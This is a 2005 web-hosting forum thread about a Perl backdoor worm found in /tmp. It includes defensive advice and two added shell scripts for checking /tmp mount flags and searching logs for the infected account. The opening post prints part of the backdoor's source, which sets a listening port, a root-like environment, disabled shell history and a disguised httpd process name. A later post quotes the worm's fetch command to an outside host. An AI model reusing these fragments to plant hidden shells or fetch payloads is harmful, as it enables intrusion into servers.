The Community Forums

I got a perl worm exploit in temp, it defaced only my home pages

Discussion in 'General Discussion' started by jean louis, Jan 23, 2005.

  1. jean louis

    jean louis Member

    Joined:
    Dec 18, 2003
    Messages:
    21
    Likes Received:
    0
    Trophy Points:
    1
    I got a perl worm exploit in tmp, it defaced only my home pages.

    The perl worm is called bd.txt.
    I already got the anti-Santy worm asw.txt, and now this one.

    I have to find a way to stop perl from executing scripts in my temp folder.
    Help????

    The bd in question:
    #!/usr/bin/perl
    # Telnet-like Standard Daemon 0.7
    #
    # 0ldW0lf - oldwolf@atrixteam.net
    # - old-wolf@zipmai.com
    # - www.atrix.cjb.net
    # - www.atrixteam.net
    #
    # For those guys that still like to open ports
    # and use non-rooted boxes
    #
    # This has been developed to join in the TocToc
    # project code, now it's done and I'm distributing
    # this separated
    #
    # This one i made without IO::Pty so it uses
    # only standard modules... enjoy it
    #
    # tested on linux boxes.. probably will work fine on others
    # any problem... #atrix@irc.brasnet.org
    # SENHA: 12345
    #


    ##########################################################
    # ******************* CONFIGURATION ******************** #
    ##########################################################
    my $PORT = $ARGV[0] || 8765; # default port is 3847
    my $PASS = 'SQ6qavptOhtmI'; # encripted password
    my $SHELL = "/bin/bash"; # shell to be executed
    my $HOME = "/tmp"; # your HOME
    my $PROC = "/usr/local/apache/bin/httpd"; # name of the process
    my $PASS_PROMPT = "Password: "; # password prompt
    my $WRONG_PASS = "Wrong password!"; # "wrong password" message
    my @STTY = ('sane', 'dec'); # stty arguments
    ##########################################################


    # feel free to change the ENV
    #### ENVironment ####
    $ENV{HOME} = $HOME;
    #$ENV{PS1} = '[\u@\h \W]: '; # the way i like :)
    # colorful PS1 is also funny :)
    $ENV{PS1} = '\[\033[3;36m\][\[\033[3;34m\]\[\033[1m\]\u\[\033[3;36m\]@\[\033[0m\]\[\033[3;34m\]\[\033[1m\]\h \[\033[0m\]\[\033[1m\]\W\[\033[0m\]\[\033[3;36m\]]\[\033[0m\]\[\033[1m:\[\033[0m\] ';
    $ENV{MAIL} = '/var/mail/root';
    $ENV{PATH} = '/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin';
    $ENV{HISTFILE} = '/dev/null';
    $ENV{USER} = 'root';
    $ENV{LOGNAME} = 'root';
    $ENV{LS_OPTIONS} = ' --color=auto -F -b -T 0';
    $ENV{LS_COLORS}

    I did not put the complete code as it is too many words.
     

    Attached Files:

    • bd.txt
      File size:
      11.5 KB
      Views:
      59
    #1 jean louis, Jan 23, 2005
    Last edited: Jan 23, 2005
  2. RandyO

    RandyO Well-Known Member

    Joined:
    Jun 17, 2003
    Messages:
    173
    Likes Received:
    0
    Trophy Points:
    16
    There must be 20 posts on this subject; I suggest you either do a search or get someone to work on your server that knows what they are doing...
     
  3. promak

    promak Well-Known Member

    Joined:
    Oct 6, 2001
    Messages:
    248
    Likes Received:
    0
    Trophy Points:
    16
    I got it today; it just attacks others.

    And I just chmod 000 all .pl files, and changed the files to another user, not the default nobody.

    :cool:
     
  4. RandyO

    RandyO Well-Known Member

    Joined:
    Jun 17, 2003
    Messages:
    173
    Likes Received:
    0
    Trophy Points:
    16
    LABEL=/tmp /tmp ext3 defaults,noexec,nosuid 1 2

    Guess search is broken.
     
  5. promak

    promak Well-Known Member

    Joined:
    Oct 6, 2001
    Messages:
    248
    Likes Received:
    0
    Trophy Points:
    16
    /dev/md5 /tmp ext3 defaults,noexec,nosuid 1 2

    But today I checked /tmp:

    it has this worm, and apache is at 99%.

    .hitler
    31337
    31338

    When I open it with the Webmin file manager edit function, my Norton shows it is a backdoor trojan.

    wget bot.radionova.info

    I have chmod'd wget before. Can we check which log file to see which client's site is infected, and stop the worm and remove the account?

    Thanks.
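The two fstab lines above are the right idea, and this post also shows their limit: noexec only stops the kernel from executing a file that lives on /tmp directly. A dropper written there and started as `perl /tmp/bd.txt` still runs, because the interpreter reads the file as data, and nothing about the mount stops a web process from writing into /tmp in the first place. The flags are still worth having for the compiled binaries worms try to run, and they are easy to get wrong (an fstab edit changes nothing until the filesystem is remounted, so what counts is what /proc/mounts says). The script below is an added example, not code from this thread; it reads a /proc/mounts-format file and reports whether a mount point has both flags. The sample file it builds at the end is constructed to stand in for /proc/mounts.

```shell
#!/bin/sh
# Added example, not code from the thread: verify that a mount point carries
# noexec and nosuid. Reads a /proc/mounts-format file (device mountpoint fstype
# options dump pass) so the check runs against constructed input here and
# against the real /proc/mounts on a server.

# Print the option string of mount point $1 from mounts file $2; empty if $1 is
# not a mount point of its own (it then inherits the options of its parent).
mount_opts() {
    awk -v mp="$1" '$2 == mp { print $4 }' "$2" | tail -n 1
}

# Return 0 if the comma-separated option string $1 contains every flag named
# after it, 1 otherwise.
has_flags() {
    _list=",$1,"
    shift
    for _f in "$@"; do
        case "$_list" in
            *",$_f,"*) ;;
            *) return 1 ;;
        esac
    done
    return 0
}

# Verdict for mount point $1 using mounts file $2 (default /proc/mounts).
# Exit status: 0 hardened, 1 missing flags, 2 not a separate mount.
tmp_mount_check() {
    _mp="$1"; _mounts="${2:-/proc/mounts}"
    _opts=$(mount_opts "$_mp" "$_mounts")
    if [ -z "$_opts" ]; then
        echo "$_mp: not a separate filesystem, options inherited from parent"
        return 2
    fi
    if has_flags "$_opts" noexec nosuid; then
        echo "$_mp: ok ($_opts)"
        return 0
    fi
    echo "$_mp: missing noexec and/or nosuid ($_opts)"
    return 1
}

# Constructed sample in /proc/mounts format, for an offline run; on a real host
# simply call: tmp_mount_check /tmp
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
/dev/sda1 / ext3 rw 0 0
/dev/md5 /tmp ext3 rw,noexec,nosuid 0 0
/dev/sda3 /var/tmp ext3 rw 0 0
EOF
for mp in /tmp /var/tmp /home; do
    tmp_mount_check "$mp" "$SAMPLE" || true
done
rm -f "$SAMPLE"
```

Run it with no sample file on a real box and it reads /proc/mounts; /var/tmp and any other world-writable directory deserve the same check, since a worm that cannot write to /tmp will use the next one it finds.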
     
  6. bmcpanel

    bmcpanel Well-Known Member

    Joined:
    Jun 1, 2002
    Messages:
    546
    Likes Received:
    0
    Trophy Points:
    16
    Gee, that was surely helpful.

    Okay dude, it's fairly simple to find out which account it came from. cd to your /tmp directory,

    cd /tmp

    list files

    ls -l

    This will show the user owner of the file. Once you find the username of the b-a-d file, go to that user's directory and check for a forum located there. I lay odds that you will see a forum there (common hacking target and entry point). I would backup the forum and then remove it.

    This happened to me a couple of months ago (different worm/virus), but same method of entry. Only defaced the site of the user which was violated. The user had an outdated forum he got from a third party that had several known vulnerabilities. The first time, I removed his forum and let him stay. But, I moved his site to a different web server just to prove a point. On the new web server, the same thing happened. He had re-installed the forum. Found suspicious /tmp files with the same user as owner. I told the client he could not install the forum again. He decided to leave our service instead. Haven't had that problem since he left.
     
  7. rpmws

    rpmws Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    1,824
    Likes Received:
    5
    Trophy Points:
    38
    Location:
    back woods of NC, USA

    Chances are the /tmp files will be owned by nobody. He will have to do some log hunting.
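Putting bmcpanel's and rpmws's steps together: the file owner in /tmp names the account directly when the web application ran as that user, and when the owner is the web server user (nobody) the account has to be found in the web logs instead. The script below is an added example, not code from this thread. It takes an owner/path listing of /tmp and, for the nobody-owned case, scans per-domain access logs for the request that carried an indicator such as the dropped file name. It assumes GNU find for the listing (`find /tmp -maxdepth 1 -printf '%u %p\n'`), Apache combined log format, and one log file per domain as cPanel keeps under /usr/local/apache/domlogs (path assumed; adjust it). The listing and log lines at the end are constructed sample data that reuse the file name and host seen in promak's post.

```shell
#!/bin/sh
# Added example, not code from the thread. Step 1 reads owners off a /tmp
# listing; step 2 searches per-domain access logs (assumed layout: one combined
# format log per domain, e.g. cPanel's /usr/local/apache/domlogs) for requests
# carrying an indicator, so the domain, and hence the account, that received
# the request is identified even when the dropped file is owned by nobody.

# Step 1. $1 is a file of "owner path" lines (in practice the output of
# find /tmp -maxdepth 1 -printf '%u %p\n'). Print files owned by ordinary
# accounts: the account's own web application wrote them.
files_by_account() {
    awk '$1 != "nobody" && $1 != "root" { print $1 ": " $2 }' "$1"
}

# Step 2. $1 is the directory of per-domain logs; the remaining arguments are
# fixed-string indicators (dropped file name, download host, ...). For every
# log line containing any indicator print: domain client_ip request.
find_domain_by_indicator() {
    _logdir="$1"; shift
    for _log in "$_logdir"/*; do
        [ -f "$_log" ] || continue
        _dom=$(basename "$_log")
        # Combined format: ip - - [time] "request" status bytes "referer" "agent"
        # Splitting on the double quote makes $2 the request line.
        awk -v d="$_dom" -v inds="$*" -F'"' '
            BEGIN { n = split(inds, I, " ") }
            {
                hit = 0
                for (i = 1; i <= n; i++) if (index($0, I[i])) hit = 1
                if (hit) { split($1, a, " "); print d, a[1], $2 }
            }' "$_log"
    done
}

# Constructed sample data so the script runs offline.
WORK=$(mktemp -d)
cat > "$WORK/listing" <<'EOF'
nobody /tmp/bd.txt
nobody /tmp/.hitler
alice /tmp/sess_4f2a
EOF
mkdir "$WORK/domlogs"
cat > "$WORK/domlogs/example-a.test" <<'EOF'
198.51.100.9 - - [23/Jan/2005:10:11:12 +0000] "GET /index.html HTTP/1.0" 200 512 "-" "Mozilla"
EOF
cat > "$WORK/domlogs/example-b.test" <<'EOF'
203.0.113.5 - - [23/Jan/2005:10:12:30 +0000] "GET /forum/index.php?q=wget%20bot.radionova.info/bd.txt HTTP/1.0" 200 1024 "-" "lwp-trivial"
198.51.100.9 - - [23/Jan/2005:10:13:00 +0000] "GET /forum/index.php HTTP/1.0" 200 2048 "-" "Mozilla"
EOF

echo "== files owned by accounts (their own web app wrote these) =="
files_by_account "$WORK/listing"
echo "== domains whose logs show the indicator =="
find_domain_by_indicator "$WORK/domlogs" bd.txt bot.radionova.info
rm -rf "$WORK"
```

The domain whose log contains the hit is the account to look at; the modification time of the /tmp file (`ls -l --full-time`) narrows which part of the log to read, and the path in the matching request usually points straight at the outdated forum or script bmcpanel describes.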
     